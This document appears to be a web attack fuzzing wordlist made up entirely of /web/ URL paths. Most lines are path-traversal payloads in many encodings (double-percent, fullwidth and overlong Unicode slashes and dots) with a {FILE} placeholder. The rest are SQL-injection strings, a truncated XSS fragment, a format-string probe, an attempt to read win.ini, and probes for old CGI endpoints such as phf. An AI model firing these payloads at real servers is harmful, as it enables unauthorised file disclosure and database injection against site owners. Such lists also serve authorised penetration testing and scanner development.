/web/!@,/web/\\\\?\\/,/web/&LT/,/web/(')/,/web/&,/web/..%5c/,/web/..%%35%63/
/web/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}/
/web/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}/
/web/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}/
/web/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}/
/web/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}/
/web/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}/
/web/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}/
/web/%%32%65%%32%65%%32%66{FILE}/
/web/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}/
/web/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}/
/web/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}/
/web/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}/
/web/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}/
/web/%%32%65%%32%65%%35%63{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65/{FILE}/
/web/%a%s%p%d/
/web/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}/
/web/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}/
/web/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}/
/web/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}/
/web/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}/
/web/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}/
/web/%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}/
/web/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}/
/web/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}/
/web/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}/
/web/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}/
/web/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}/
/web/%uff0e%uff0e\%uff0e%uff0e\{FILE}/
/web/%uff0e%uff0e\{FILE}/
/web/'%20or%20'x'='x/,/web/or%200=0%20,/web/hi'%20or%20'a'='a/,/web/@variable/,/web/desc/,/web/handler/,/web/tz_offset/,/web/(sqlattempt2)/,/web/count(/child::node())/,/web/%26/,/web/<xml%20SRC="xsstest.xml"%20ID=I></xml><SPAN%20DATASRC=
/web/'%20or%20uname%20like%20'%/
/web/'%20or%20username%20like%20'%/
/web/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}/
/web/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}/
/web/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}/
/web/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}/
/web/..%%32%66..%%32%66..%%32%66..%%32%66{FILE}/
/web/..%%32%66..%%32%66..%%32%66{FILE}/
/web/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}/
/web/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}/
/web/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}/
/web/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}/
/web/..%%35%63..%%35%63..%%35%63..%%35%63{FILE}/
/web/..%%35%63..%%35%63..%%35%63{FILE}/
/web/..%%35%63..%%35%63{FILE}/
/web/..%%35%63{FILE}/
/web/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}/
/web/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}/
/web/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}/
/web/..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}/
/web/..%u2215..%u2215..%u2215{FILE}/
/web/..%u2215..%u2215{FILE}/
/web/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}/
/web/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}/
/web/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}/
/web/..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}/
/web/..%u2216..%u2216..%u2216..%u2216{FILE}/
/web/..%u2216..%u2216..%u2216{FILE}/
/web/..%u2216..%u2216{FILE}/
/web/..%u2216/
/web/..%u2216{FILE}/
/web/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}/
/web/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}/
/web/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}/
/web/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}/
/web/..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}/
/web/..%uEFC8..%uEFC8..%uEFC8{FILE}/
/web/..%uEFC8..%uEFC8{FILE}/
/web/..%uEFC8{FILE}/
/web/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}/
/web/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}/
/web/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}/
/web/..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}/
/web/..%uF025..%uF025..%uF025..%uF025{FILE}/
/web/..%uF025..%uF025..%uF025{FILE}/
/web/..%uF025..%uF025{FILE}/
/web/..%uF025{FILE}/
/web/.meta/,/web/icons/,/web/status/
/web//,%ENV,//
/web/a.asp/.%u002e/.%u002e/.%u002e/.%u002e/winnt/win.ini/
/web/cgi-bin/,/web/server-info/,/web/~bin/
/web/cgi-script/,/web/phf/
/web/error/,/web/dummy/
